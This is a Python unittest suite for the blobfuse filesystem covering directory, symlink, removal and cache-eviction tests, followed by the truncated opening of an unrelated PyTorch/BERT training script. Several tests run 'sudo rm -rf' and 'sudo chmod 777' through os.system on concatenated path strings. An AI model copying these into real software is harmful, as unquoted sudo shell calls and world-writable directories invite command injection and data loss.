        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        os.mkdir(testFilePath)
        with self.assertRaises(OSError) as e:
            os.open(testFilePath, os.O_CREAT | os.O_EXCL)
        self.assertEqual(e.exception.errno, errno.EEXIST)
        os.rmdir(testFilePath)

    def test_symlink_operations(self):
        """Create directory and file symlinks and verify data is reachable through both."""
        testSymlinkDir = os.path.join(self.blobstage, "test-symlink-directory")
        testSymlinkFile = os.path.join(self.blobstage, "test-symlink-file")
        testDir = os.path.join(self.blobstage, "test-dir")
        self.assertFalse(os.path.exists(testSymlinkDir))
        self.assertFalse(os.path.islink(testSymlinkDir))
        os.makedirs(testDir)
        os.symlink(testDir, testSymlinkDir)
        self.assertTrue(os.path.exists(testDir))
        self.assertTrue(os.path.islink(testSymlinkDir))
        filetxt = "Some file text here."
        testFilePath = os.path.join(testDir, "file1")
        with open(testFilePath, 'w') as fileblob:
            fileblob.write(filetxt)
        os.symlink(testFilePath, testSymlinkFile)
        # test accessing data with the symlink directory path
        testFilewSymlinkPath = os.path.join(testSymlinkDir, "file1")
        self.assertTrue(os.path.exists(testFilewSymlinkPath))
        with open(testFilewSymlinkPath, 'r') as testFile:
            contents = testFile.read()
        self.assertEqual(filetxt, contents)
        # test accessing the same data with the symlink file path
        self.assertTrue(os.path.exists(testSymlinkFile))
        with open(testSymlinkFile, 'r') as testFile2:
            contents2 = testFile2.read()
        self.assertEqual(filetxt, contents2)
        # NOTE(review): no cleanup here -- testDir and both symlinks are left
        # behind; verify the suite teardown removes them.
class MakeDirectoryTests(BlobfuseTest):
    """Directory-creation tests: mkdir/makedirs, listing, nesting, and name conflicts."""

    # test for a lot of directory commands
    # Test making a directory, making files in that directory, making subdirectories, and files for the subdirectories
    # use listdir to check the contents of that directory
    # test that we cannot remove a nonempty directory
    # test that we actually removed the directory
    def test_directory_operations(self):
        testDir = os.path.join(self.blobstage, "testDirectory")
        subdir1 = "subDir1"
        #subdir2 = "Th0s\!is-a%directory&name @1"
        self.assertFalse(os.path.exists(testDir))
        self.assertFalse(os.path.isdir(testDir))
        os.makedirs(testDir)
        self.assertTrue(os.path.exists(testDir))
        self.assertTrue(os.path.isdir(testDir))
        filetxt = "Some file text here."
        with open(os.path.join(testDir, "file1"), 'w') as fileblob:
            fileblob.write(filetxt)
        with open(os.path.join(testDir, "file2"), 'w') as fileblob:
            fileblob.write(filetxt)
        with open(os.path.join(testDir, "file3"), 'w') as fileblob:
            fileblob.write(filetxt)
        testSubDir1 = os.path.join(testDir, subdir1)
        os.makedirs(testSubDir1)
        #testSubDir2 = os.path.join(testDir, subdir2)
        #testSubDir2 = "\"" + testSubDir2 + "\""
        #os.system("sudo mkdir " + testSubDir2)
        #os.system("sudo chmod 777 " + testSubDir2)
        # three files plus one subdirectory
        children = os.listdir(testDir);
        self.assertEqual(4, len(children))
        self.assertTrue("file1" in children)
        self.assertTrue("file2" in children)
        self.assertTrue("file3" in children)
        self.assertTrue(subdir1 in children)
        #self.assertTrue(subdir2 in children)
        # Directory not empty should throw
        # NOTE(review): the "should throw" case is never actually exercised --
        # the subdir is force-removed with rm -rf instead of os.rmdir.
        os.system("sudo rm -rf " + testSubDir1)
        os.remove(os.path.join(testDir, "file2"))
        children = os.listdir(testDir)
        self.assertEqual(2, len(children))
        self.assertTrue("file1" in children)
        self.assertTrue("file3" in children)
        #self.assertTrue(subdir2 in children)
        #os.rmdir(testSubDir2)
        os.remove(os.path.join(testDir, "file1"))
        os.remove(os.path.join(testDir, "file3"))
        children = os.listdir(testDir)
        self.assertEqual(0, len(children))
        os.system("sudo rm -rf " + testDir)
        self.assertFalse(os.path.exists(testDir))
        self.assertFalse(os.path.isdir(testDir))

    # test of validating of making an empty directory
    def test_make_new_directory(self):
        # Note that based on the value of self.blobdir, this also tests the relative path
        testDirName = "testDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        self.validate_dir_creation(testDirPath, testDirName, self.blobstage)
        os.rmdir(os.path.join(self.blobstage, testDirName))

    # test if we try to make a directory with a name that already exists
    def test_make_directory_name_exists(self):
        testDirName = "testDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        # second mkdir on the same path must fail with EEXIST
        try:
            os.mkdir(testDirPath)
        except OSError as e:
            self.assertEqual(e.errno, errno.EEXIST)
        os.rmdir(os.path.join(self.blobstage, testDirName))

    # replace scandir eventually
    '''
    def test_close_directory(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        os.mkdir(testDirPath)
        f = open(testFilePath, "w")
        f.close()
        entries = os.scandir(testDirPath)
        entries.close()
        with self.assertRaises(StopIteration):
            next(entries)
        os.remove(testFilePath)
        os.rmdir(testDirPath)
    '''''

    # This test throws a errno 5 (I/O error) instead of Name too long error
    # apparently in the past this tests has thrown a 400
    # TODO: Figure out the appropriate error code to be thrown here otherwise this test works for the most part
    '''
    def test_make_directory_long_name(self):
        homeDir = os.getcwd()
        os.chdir(self.blobstage)
        # The service currently has a limit of 1024 characters
        testDir = "a"
        while len(testDir) < 1100:
            testDir += os.path.join(testDir, "a" * 200)
        with self.assertRaises(OSError) as e:
            os.makedirs(testDir)
        self.assertEqual(e.exception.errno, errno.ENAMETOOLONG)
        shutil.rmtree("aa")
        os.chdir(homeDir)
    '''

    # test making a directory with an absolute path
    def test_make_directory_absolute_path(self):
        testDirName = "testDir"
        testDirPath = os.path.join(os.getcwd(), self.blobstage, testDirName)
        testDirAbsPath = os.path.abspath(testDirPath)
        os.mkdir(testDirAbsPath)
        self.validate_dir_creation(testDirAbsPath, testDirName, self.blobstage)
        os.rmdir(testDirAbsPath)

    # test make directory and creating a file within the directory
    def test_make_directory_add_file(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        testFileName = "testFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        f = open(testFilePath, "w")
        f.close()
        # Note this also tests opening and reading a created directory with only files
        entries = os.listdir(testDirPath)
        self.assertTrue(len(entries) == 1)  # Ensure we cannot see the .directory blob
        self.assertTrue(entries[0] == testFileName)
        os.remove(testFilePath)
        os.rmdir(testDirPath)

    # test making a directory and making a subdirectory within it
    def test_make_directory_add_subdir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        testSubdirName = "testSubdir"
        testSubdirPath = os.path.join(testDirPath, testSubdirName)
        os.mkdir(testSubdirPath)
        self.validate_dir_creation(testSubdirPath, testSubdirName, testDirPath)
        # Note this also tests opening and reading a created directory with only directories
        entries = os.listdir(testDirPath)
        self.assertTrue(len(entries) == 1)  # Ensure we cannot see the .directory blob
        self.assertTrue(entries[0] == testSubdirName)
        os.rmdir(testSubdirPath)
        os.rmdir(testDirPath)
class OpenListDirectoryTests(BlobfuseTest):
    """Directory-listing tests: empty, missing, absolute-path, and nested contents."""

    # test making an empty directory and checking with list dir
    def test_open_directory_dir_empty(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        entries = os.listdir(testDirPath)  # Note this also tests opening via relative path on existing directory
        self.assertTrue(len(entries) == 0)
        os.rmdir(testDirPath)

    # testing open / list dir with a nonexistent directory
    def test_open_directory_dir_never_created(self):
        testDirName = "Test"
        testDirPath = os.path.join(self.blobstage, testDirName)
        # listdir on a path that was never created must fail with ENOENT
        with self.assertRaises(OSError) as e:
            os.listdir(testDirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)

    # test open / list dir on a path that's absolute
    def test_open_directory_absolute_path(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testDirAbs = os.path.abspath(testDirPath)
        os.mkdir(testDirAbs)
        entries = os.listdir(testDirAbs)
        self.assertTrue(len(entries) == 0)
        os.rmdir(testDirAbs)

    # test open / list dir with a directory with empty subdirectories and files
    def test_open_directory_with_files_and_subdirs(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "TestFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        testSubdirName = "TestSubdir"
        testSubdirPath = os.path.join(testDirPath, testSubdirName)
        os.mkdir(testDirPath)
        os.mkdir(testSubdirPath)
        testFile = open(testFilePath, "w")
        testFile.close()
        # listing must show exactly the file and the subdirectory
        entries = os.listdir(testDirPath)
        self.assertEqual(len(entries), 2)
        self.assertTrue(testFileName in entries)
        self.assertTrue(testSubdirName in entries)
        os.remove(testFilePath)
        shutil.rmtree(testDirPath)

    # test list directory with a directory with nonempty subdirectory
    def test_read_directory_with_non_empty_subdir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testSubdirName = "TestSubdir"
        testSubdirPath = os.path.join(testDirPath, testSubdirName)
        testFileName = "TestFile"
        testFilePath = os.path.join(testSubdirPath, testFileName)
        os.mkdir(testDirPath)
        os.mkdir(testSubdirPath)
        testFile = open(testFilePath, "w")
        testFile.close()
        # the parent lists only the subdirectory; the subdirectory lists only the file
        entries = os.listdir(testDirPath)
        self.assertEqual(len(entries), 1)
        self.assertEqual(entries[0], testSubdirName)
        entries = os.listdir(testSubdirPath)
        self.assertEqual(len(entries), 1)
        self.assertEqual(entries[0], testFileName)
        os.remove(testFilePath)
        shutil.rmtree(testDirPath)

    # test list dir with empty directory
    def test_read_directory_empty_dir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        entries = os.listdir(testDirPath)
        self.assertEqual(0, len(entries))
        shutil.rmtree(testDirPath)
class RemoveDirectoryTests(BlobfuseTest):
    """Directory-removal tests: empty, non-empty, missing, and post-removal access."""

    # test remove empty directory
    def test_remove_directory_empty(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        os.rmdir(testDirPath)  # Note this also tests removal via relative path
        self.validate_dir_removal(testDirPath, testDirName, self.blobstage)

    # test remove directory path that's absolute
    def test_remove_directory_absolute_path(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testDirAbs = os.path.abspath(testDirPath)
        os.mkdir(testDirPath)
        os.rmdir(testDirAbs)
        self.validate_dir_removal(testDirAbs, testDirName, self.blobstage)

    # test remove directory with non empty files, expect error when trying to remove a directory without
    # removing the files first
    def test_remove_directory_non_empty_files(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        os.mkdir(testDirPath)
        testFile = open(testFilePath, "w")
        testFile.close()
        # ENOTEMPTY check skipped for ADLS -- presumably removal behaves
        # differently there; TODO confirm.
        if not ADLS_TEST :
            try:
                os.rmdir(testDirPath)
            except OSError as e:
                self.assertEqual(e.errno, errno.ENOTEMPTY)
        os.system("sudo rm -rf "+ testFilePath)
        os.system("sudo rm -rf "+ testDirPath)

    # test removing a directory with a non empty subdirectory, expect an error if trying to remove the
    # parent directory without first emptying the file and subdirectory or removing it recursively
    def test_remove_directory_non_empty_subdir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testSubdirName = "TestSubdir"
        testSubdirPath = os.path.join(testDirPath, testSubdirName)
        os.makedirs(testSubdirPath)
        if not ADLS_TEST :
            try:
                os.rmdir(testDirPath)
            except OSError as e:
                self.assertEqual(e.errno, errno.ENOTEMPTY)
        os.system("sudo rm -rf "+ testSubdirPath)
        os.system("sudo rm -rf "+ testDirPath)

    # test removing the directory that doesn't exist
    def test_remove_directory_never_created(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        with self.assertRaises(OSError) as e:
            os.rmdir(testDirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)

    # test removing a directory and expect an error when attempting to open the directory
    def test_remove_directory_cd_into(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        os.rmdir(testDirPath)
        homeDir = os.getcwd()
        # chdir into the removed directory must fail with ENOENT
        with self.assertRaises(OSError) as e:
            os.chdir(testDirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        os.chdir(homeDir)

    # use listdir tests instead unless earlier versions of python are available
    '''
    def test_close_directory(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        os.mkdir(testDirPath)
        f = open(testFilePath, "w")
        f.close()
        entries = os.scandir(testDirPath)
        entries.close()
        with self.assertRaises(StopIteration):
            next(entries)
        os.remove(testFilePath)
        os.rmdir(testDirPath)
    def test_close_directory_already_closed(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        os.mkdir(testDirPath)
        f = open(testFilePath, "w")
        f.close()
        entries = os.scandir(testDirPath) #use scandir with newer versions of python
        entries.close()
        entries.close()
        os.remove(testFilePath)
        os.rmdir(testDirPath)
    '''

    # test fuse handling a crash, when attempting to close a file that has the same name as a blob
    # but that's not in the mounted container
    def test_fuse_crash(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "TestFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        testSubdirName = "TestSubdir"
        testSubdirPath = os.path.join(testDirPath, testSubdirName)
        os.mkdir(testDirPath)
        os.mkdir(testSubdirPath)
        testFile = open(testFilePath, "w")
        # close() takes no positional argument; this raises TypeError in Python
        # without actually closing the file
        with self.assertRaises(TypeError) as e:
            testFile.close(testFile)  # This line seems to make fuse crash
        testFile.close()
        # the mount must still be usable after the bad close() call
        entries = os.listdir(testDirPath)
        self.assertTrue(len(entries) == 2)
        self.assertTrue(testFileName in entries)
        self.assertTrue(testSubdirName in entries)
        os.remove(testFilePath)
        shutil.rmtree(testDirPath)

    # TODO: implement flock
    '''
    class FlockTests(BlobfuseTest):
        def test_file_lock_shared(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_SH)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            fcntl.flock(fd2, fcntl.LOCK_SH) # Acquiring two shared locks is valid
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_exclusive(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            with self.assertRaises(BlockingIOError) as e:
                fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
            self.assertEqual(e.exception.errno, errno.EAGAIN)
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_shared_then_exclusive(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_SH)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            with self.assertRaises(BlockingIOError) as e:
                fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
            self.assertEqual(e.exception.errno, errno.EAGAIN)
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_exclusive_then_shared(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            with self.assertRaises(BlockingIOError) as e:
                fcntl.flock(fd2, fcntl.LOCK_SH | fcntl.LOCK_NB)
            self.assertEqual(e.exception.errno, errno.EAGAIN)
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_change_type(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            fcntl.flock(fd, fcntl.LOCK_SH)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            fcntl.flock(fd2, fcntl.LOCK_SH)
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_release(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            fcntl.flock(fd, fcntl.LOCK_UN)
            fd2 = os.open(testFilePath, os.O_WRONLY)
            fcntl.flock(fd2, fcntl.LOCK_EX)
            os.close(fd)
            os.close(fd2)
            os.remove(testFilePath)
        def test_file_lock_release_on_close(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            os.close(fd)
            fd = os.open(testFilePath, os.O_WRONLY)
            fcntl.flock(fd, fcntl.LOCK_EX)
            os.close(fd)
            os.remove(testFilePath)
        def test_file_lock_close_file(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            os.close(fd)
            with self.assertRaises(OSError) as e:
                fcntl.flock(fd, fcntl.LOCK_SH)
            self.assertEqual(e.exception.errno, errno.EBADF)
            os.remove(testFilePath)
        def test_file_lock_release_never_acquired(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_UN)
            os.close(fd)
            os.remove(testFilePath)
        def try_lock_file(self, filePath):
            fd = os.open(filePath, os.O_WRONLY)
            fcntl.flock(fd, fcntl.LOCK_EX)
        def test_file_block_on_lock(self):
            testFileName = "testFile"
            testFilePath = os.path.join(self.blobstage, testFileName)
            fd = os.open(testFilePath, os.O_CREAT)
            fcntl.flock(fd, fcntl.LOCK_EX)
            # We want to assert that the file is locked even between processes, not just threads
            process = multiprocessing.Process(target=self.try_lock_file, args=(testFilePath,))
            process.start()
            process.join(2)
            # If the process has exitcode=none, it is still running and therefore blocked as expected
            self.assertIsNone(process.exitcode)
            process.terminate()
            os.close(fd)
            os.remove(testFilePath)
    '''
#note: these tests take a certain amount of time due to the volume of files
#filling the mounted container, emptying the container and waiting for the cache to clear itself
#in order to make it more efficient to fill the cache without taking so much time
#we allocate a small ram disk in order to reach capacity with the disk
#also make sure this test is in the python_test directory
#if you have issues running these tests due to access permissions issue. It might help to
#manually run 'sudo chown <username> <foldername>' before these tests
class CacheTests(BlobfuseTest):
    """Cache-eviction tests.

    Blobfuse is mounted with its file cache on a small tmpfs RAM disk so the
    cache-usage thresholds can be reached quickly.  setUp/tearDown here replace
    the BlobfuseTest fixtures (no super() calls): they create and destroy the
    RAM disk, the cache directory, and the mount point.
    """
    # path to ramdisk
    ramDiskPath = "/mnt/ramdisk"
    # path to cache container for blobfuse in ramdisk
    ramDiskTmpPath = "/mnt/ramdisk/blobfuseTmp"
    # path to mounted container in ramdisk
    ramDiskContainerPath = "/mnt/ramdiskMountedCnt"
    # upper/high cache-usage threshold (percent of disk)
    upper_threshold = 90
    # lower/bottom cache-usage threshold (percent of disk)
    lower_threshold = 80

    def setUp(self):
        """Create the RAM-disk, cache, and mount-point directories (world-writable)."""
        print (" >> ", self._testMethodName)
        # create temp/cache directory
        if not os.path.exists(self.ramDiskPath):
            os.system("sudo mkdir " + self.ramDiskPath)
            os.system("sudo chown -R `whoami` " + self.ramDiskPath)
            os.system("sudo chmod 777 " + self.ramDiskPath)
        if not os.path.exists(self.ramDiskTmpPath):
            os.system("sudo mkdir " + self.ramDiskTmpPath)
            os.system("sudo chown -R `whoami` " + self.ramDiskTmpPath)
            os.system("sudo chmod 777 " + self.ramDiskTmpPath)
        if not os.path.exists(self.ramDiskContainerPath):
            os.system("sudo mkdir " + self.ramDiskContainerPath)
            os.system("sudo chmod 777 " + self.ramDiskContainerPath)

    def tearDown(self):
        """Unmount blobfuse and the RAM disk, then wipe the leftover directories."""
        # unmount blobfuse
        os.system("fusermount -u " + self.ramDiskContainerPath)
        # unmount ramdisk
        os.system("sudo umount " + self.ramDiskPath)
        # delete cache/temp directory if still exists
        if os.path.exists(self.ramDiskTmpPath):
            os.system("sudo rm -rf "+ self.ramDiskTmpPath + "/*")
        # delete ramdisk directory contents if still exists
        if os.path.exists(self.ramDiskPath):
            os.system("sudo rm -rf "+ self.ramDiskPath + "/*")

    def makeRamDisk(self, disk_size):
        """Mount a tmpfs of the given size (e.g. '100M') at ramDiskPath."""
        os.system("sudo mount -t tmpfs -o size=" + disk_size + " tmpfs " + self.ramDiskPath)

    def startBlobfuse(self, cache_timeout):
        """Mount blobfuse using the RAM disk as its cache directory.

        cache_timeout is the file-cache timeout in seconds, passed as a string.
        Changes the working directory to the build tree to find ./blobfuse.
        """
        os.system("rm -rf " + self.ramDiskTmpPath + "/*")
        os.system("rm -rf " + self.ramDiskContainerPath + "/*")
        blobfuseMountCmd = "./blobfuse " + self.ramDiskContainerPath + " --tmp-path=" + self.ramDiskTmpPath + \
            " -o attr_timeout=240 -o entry_timeout=240 -o negative_timeout=120 -o allow_other " \
            "--file-cache-timeout-in-seconds=" + cache_timeout + \
            " --config-file=../connection.cfg --log-level=LOG_DEBUG --use-attr-cache=true"
        if ADLS_TEST :
            blobfuseMountCmd = blobfuseMountCmd + " --use-adls=true"
        os.chdir(os.path.dirname(os.path.abspath(__file__)) + "/../build")
        os.system(blobfuseMountCmd)

    def test_cache_large_files(self):
        """Fill the cache past capacity with large files and verify eviction
        brings usage back under the lower threshold."""
        testDirName = "testLargeFileDir"
        testDirPath = os.path.join(self.ramDiskContainerPath, testDirName)
        ramDiskSize = "1024M"
        cacheTimeout = "120"
        self.makeRamDisk(ramDiskSize)
        self.startBlobfuse(cacheTimeout)
        # arrange
        if not os.path.exists(testDirPath):
            os.mkdir(testDirPath)
        filename = str(uuid.uuid4())
        # act (create many files)
        for i in range(0, 5):
            filename = str(uuid.uuid4())
            filepath = os.path.join(testDirPath, filename)
            if LOCAL_TEST :
                os.system("head -c 1M < /dev/zero > " + filepath)
            else :
                os.system("head -c 1M < /dev/urandom > " + filepath)
                os.system("head -c 200M < /dev/zero >> " + filepath)
                os.system("head -c 2M < /dev/urandom >> " + filepath)
        # this makes 1015MB, so it fills the cache, so the threshold should be met
        # assert (check cache)
        # check how close we are to threshold after filling the cache
        # if we are past low threshold, fail the test
        # if we are under then we assured we deleted to not hit the threshold
        df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
        output = df.communicate()[0]
        if LOCAL_TEST :
            device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
        else :
            device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
        if LOCAL_TEST :
            print("Ignoring usage check in Local Test")
        else :
            self.assertLessEqual(int(percent.strip('%')), self.lower_threshold)
        # cleanup
        if os.path.exists(testDirPath):
            os.system("sudo rm -rf " + testDirPath)

    def test_cache_small_files(self):
        """Fill the cache with small files, then add one more to cross the high
        threshold and verify eviction brings usage under the lower threshold."""
        testDirName = "testSmallFileDir"
        testDirPath = os.path.join(self.ramDiskContainerPath, testDirName)
        ramDiskSize = "100M"
        cacheTimeout = "120"
        self.makeRamDisk(ramDiskSize)
        self.startBlobfuse(cacheTimeout)
        # arrange
        if not os.path.exists(testDirPath):
            os.system("sudo mkdir " + testDirPath)
        if ADLS_TEST :
            os.system("sudo chmod 777 " + testDirPath)
        filename = str(uuid.uuid4())
        # act (create many files)
        for i in range(0, 8):
            filename = str(uuid.uuid4())
            filepath = os.path.join(testDirPath, filename)
            if LOCAL_TEST :
                os.system("head -c 1M < /dev/zero >> " + filepath)
            else :
                os.system("head -c 1M < /dev/urandom > " + filepath)
                os.system("head -c 7M < /dev/zero >> " + filepath)
                os.system("head -c 2M < /dev/urandom >> " + filepath)
        # assert (check cache)
        # check if we reached the low threshold. we expect no cleanup and to stay at the low threshold
        df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
        output = df.communicate()[0]
        if LOCAL_TEST :
            device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
        else :
            device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
        # if we add another file then it should reduce the cache size to below the lower threshold
        # because we hit the high threshold
        filename = str(uuid.uuid4())
        filepath = os.path.join(testDirPath, filename)
        if not LOCAL_TEST :
            os.system("head -c 1M < /dev/urandom > " + filepath)
            os.system("head -c 7M < /dev/zero >> " + filepath)
            os.system("head -c 2M < /dev/urandom >> " + filepath)
        # assert (check cache)
        # check how close we are to threshold after filling the cache
        # if we are past the low threshold, fail the test
        # if we are under then we assured we deleted to not hit the threshold
        df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
        output = df.communicate()[0]
        if LOCAL_TEST :
            device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
        else :
            device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
        if LOCAL_TEST :
            # fixed: message was previously misspelled "Ingoring"
            print("Ignoring usage check for Local Test")
        else :
            self.assertLessEqual(int(percent.strip('%')), self.lower_threshold)
        # cleanup
        if os.path.exists(testDirPath):
            os.system("sudo rm -rf " + testDirPath)
# Run the full blobfuse test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
train.py | #!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import os
import random
import signal
import torch
import distributed
import numpy as np
from transformers import BertTokenizer
from models import data_loader
from models.data_loader import load_dataset
from models.optimizers import build_optim, build_optim_bert, build_optim_other
from models.model import Model as graph_model
from models.model_trainer import build_trainer as graph_build_trainer
from models.seq2seq import Model as seq2seq_model
from models.seq2seq_trainer import build_trainer as seq2seq_build_trainer
from others.logging import logger, init_logger
# Checkpoint option keys that override the command-line args when resuming
# training from --train_from (applied in train_single).
model_flags = ['encoder', 'decoder', 'enc_heads', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
               'dec_heads', 'dec_layers', 'dec_hidden_size', 'dec_ff_size']
def str2bool(v):
    """Parse a human-friendly boolean string for argparse's ``type=``.

    Accepts yes/no, true/false, t/f, y/n, 1/0 (case-insensitive); raises
    argparse.ArgumentTypeError for anything else.
    """
    lowered = v.lower()
    truthy = ('yes', 'true', 't', 'y', '1')
    falsy = ('no', 'false', 'f', 'n', '0')
    if lowered in truthy:
        return True
    if lowered in falsy:
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def train_multi(args):
    """ Spawns 1 process per GPU

    Launches args.world_size child processes running run(); child failures are
    reported through an mp.SimpleQueue watched by ErrorHandler, which re-raises
    the child's traceback in this parent process.
    """
    init_logger()
    nb_gpu = args.world_size
    # 'spawn' start method: each child gets a fresh interpreter
    mp = torch.multiprocessing.get_context('spawn')
    # Create a thread to listen for errors in the child processes.
    error_queue = mp.SimpleQueue()
    error_handler = ErrorHandler(error_queue)
    # Train with multiprocessing.
    procs = []
    for i in range(nb_gpu):
        device_id = i
        procs.append(mp.Process(target=run, args=(args,
            device_id, error_queue,), daemon=True))
        procs[i].start()
        logger.info(" Starting process pid: %d " % procs[i].pid)
        error_handler.add_child(procs[i].pid)
    # wait for all workers to finish
    for p in procs:
        p.join()
def run(args, device_id, error_queue):
    """ run process

    Child-process entry point for multi-GPU training: initializes the
    distributed backend for this device, then runs single-device training.
    Any exception (other than KeyboardInterrupt) is forwarded to the parent
    via error_queue as (gpu_rank, formatted traceback).
    """
    # gpu_ranks arrives as an iterable of strings -- presumably from argparse;
    # normalize to ints before use. TODO confirm against the arg parser.
    setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
    try:
        gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks, args.port)
        print('gpu_rank %d' % gpu_rank)
        # sanity check: the rank assigned by the backend must match our slot
        if gpu_rank != args.gpu_ranks[device_id]:
            raise AssertionError("An error occurred in \
                  Distributed initialization")
        train_single(args, device_id)
    except KeyboardInterrupt:
        pass  # killed by parent, do nothing
    except Exception:
        # propagate exception to parent process, keeping original traceback
        import traceback
        error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
    """A class that listens for exceptions in children processes and propagates
    the tracebacks to the parent process."""

    def __init__(self, error_queue):
        """ init error handler

        Starts a daemon thread that blocks on error_queue and installs a
        SIGUSR1 handler so the error is re-raised on the main thread.
        """
        import signal
        import threading
        self.error_queue = error_queue
        # pids of registered children, killed when any child reports an error
        self.children_pids = []
        self.error_thread = threading.Thread(
            target=self.error_listener, daemon=True)
        self.error_thread.start()
        signal.signal(signal.SIGUSR1, self.signal_handler)

    def add_child(self, pid):
        """ error handler

        Register a child pid so it can be terminated when an error arrives.
        """
        self.children_pids.append(pid)

    def error_listener(self):
        """ error listener

        Blocks until a child posts (rank, traceback); re-queues the record so
        signal_handler can read it, then signals the main thread via SIGUSR1.
        """
        (rank, original_trace) = self.error_queue.get()
        self.error_queue.put((rank, original_trace))
        os.kill(os.getpid(), signal.SIGUSR1)

    def signal_handler(self, signalnum, stackframe):
        """ signal handler

        Runs on the main thread: kills all registered children and raises the
        child's traceback as an Exception here.
        """
        for pid in self.children_pids:
            os.kill(pid, signal.SIGINT)  # kill children processes
        (rank, original_trace) = self.error_queue.get()
        msg = """\n\n-- Tracebacks above this line can probably
                 be ignored --\n\n"""
        msg += original_trace
